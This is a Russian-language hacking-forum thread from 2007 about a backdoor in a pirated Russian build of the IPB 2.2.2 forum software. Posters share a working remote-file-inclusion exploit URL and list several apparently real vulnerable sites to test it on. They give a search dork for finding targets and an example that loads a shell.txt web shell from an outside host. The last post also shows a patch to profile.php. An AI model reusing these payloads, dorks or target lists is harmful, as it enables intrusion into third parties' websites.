ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Бэкдор в Ipb 2.2.2 (Русская пиратская версия)
  #1  
Старый 14.07.2007, 05:06
Аватар для Shram-spb
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
По умолчанию Бэкдор в Ipb 2.2.2 (Русская пиратская версия)

Сегодня изучал свой форум на предмет пхп иньекций и наткнулся на бэкдор.. погуглил немного и нашел в сети еше штук 30 таких форумов..
Как я понял его просто кто-то всунул туда и стал распространять...
В общем работает тока на IPB 2.2.2 Русская версия (и то не на всех)
Код:
http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
Как вам, а?
 

  #2  
Старый 14.07.2007, 05:13
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Работает не везде...
Просто надо качать нуллы от русского офф.сайта поддержки Ipb
 

  #3  
Старый 14.07.2007, 13:41
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

Не тока в левых Ipb такое есть...
 

  #4  
Старый 15.07.2007, 01:10
Аватар для Vallez
Vallez
Участник форума
Регистрация: 25.12.2005
Сообщений: 151
Провел на форуме:
874713

Репутация: 53
По умолчанию

Shram-spb напиши плз форум где работает для теста.
 

  #5  
Старый 15.07.2007, 01:33
Аватар для Shram-spb
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
По умолчанию

Код:
http://vsecrazy.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[url]
 

  #6  
Старый 15.07.2007, 13:22
Аватар для Vallez
Vallez
Участник форума
Регистрация: 25.12.2005
Сообщений: 151
Провел на форуме:
874713

Репутация: 53
По умолчанию

Не работает сайт можно ешё 1 плз.
 

  #7  
Старый 15.07.2007, 15:16
Аватар для Shram-spb
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
По умолчанию

Цитата:
Сообщение от Vallez  
Не работает сайт можно ешё 1 плз.
Видимо уже кто-то сломал.. или админы проснулись %)

Вот еще парочка.
Код:
http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
Код:
http://www.forum.partisans.com.ua/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
 

  #8  
Старый 16.07.2007, 17:45
Аватар для a1ex
a1ex
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406

Репутация: 271


Отправить сообщение для a1ex с помощью ICQ Отправить сообщение для a1ex с помощью AIM Отправить сообщение для a1ex с помощью MSN Отправить сообщение для a1ex с помощью Yahoo
По умолчанию

Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.
 

  #9  
Старый 16.07.2007, 18:07
Аватар для GrAmOzEkA
GrAmOzEkA
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669

Репутация: 178
По умолчанию

Написано же
Цитата:
[url ]
вот и подставляй туда свой урл

Вот пример:

Код:
http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://forum.antichat.ru/showthread.php
 

  #10  
Старый 16.07.2007, 18:07
Аватар для Shram-spb
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
Post

Цитата:
Сообщение от a1ex  
Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.
Код:
dork: "Русская версия IP.Board 2.2.2 © 2007  IPS, Inc."

exploit: http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://4elovek.spb.ru/shell.txt
Куда уж подробнее??
Работает на чьем-то конкретном null'e.. но на чьем я пока не выяснил..
Ясно, что версия пиратская.. если на главной странице внизу написано, что "Лицензия для...", то адназначно не прокатит..
Ищите.. я много таких нашел.. но ломать не советую.. ничего инетерсного там нет, посещаемость таких форумов как правило мала... так что лучше проверять дырку и сообщать админам... фиксится так:

/source/action_public/profile.php
строка 885:

Код:
if ( $chk )
{
         @include ($chk);
         exit();
}
Меняем на:

Код:
if ( $chk )
{
   echo "Fuck you, Spilberg... Fixed by 5hr4M...";
   exit();
}
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
скрипт распознавания форума genom-- Форумы 22 31.12.2008 15:06
Внимание! Virustotal опасен! Herevef Защита ОС: вирусы, антивирусы, файрволы. 12 17.10.2007 12:53
IPB 2.2.2 Nulled »Atom1c« PHP, PERL, MySQL, JavaScript 14 11.04.2007 10:10
Laser Squad Nemesis - Русская версия ~!DoK_tOR!~ Болталка 1 11.03.2007 00:24



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ